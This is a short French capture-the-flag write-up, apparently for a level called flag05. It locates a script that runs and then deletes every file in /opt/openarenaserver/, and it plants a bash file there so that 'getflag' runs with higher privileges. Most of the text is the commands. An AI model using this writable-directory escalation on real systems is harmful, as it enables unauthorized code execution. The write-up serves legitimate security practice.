17 lines
538 B
Plaintext
17 lines
538 B
Plaintext
avec
|
|
$ find / -user flag05 2>/dev/null
|
|
> /usr/sbin/openarenaserver
|
|
|
|
On peut cat le script il execute tout les fichier dans : /opt/openarenaserver/ puis les supprime
|
|
|
|
En creant un fichier dans ce dossier on peut observer qu'il est rapidement suprimer, donc executer
|
|
|
|
il suffit d'avoir un fichier qui contient: getflag > /tmp/flag05
|
|
|
|
$ echo -e '#!/bin/bash \x0a getflag > /tmp/.flag05 ' > /opt/openarenaserver/exploit_05
|
|
|
|
puis au bout de 1 minutes:
|
|
$ cat /tmp/.flag05
|
|
|
|
il sera alors execute et on pourra recuperer le flag dans /tmp/.flag05
|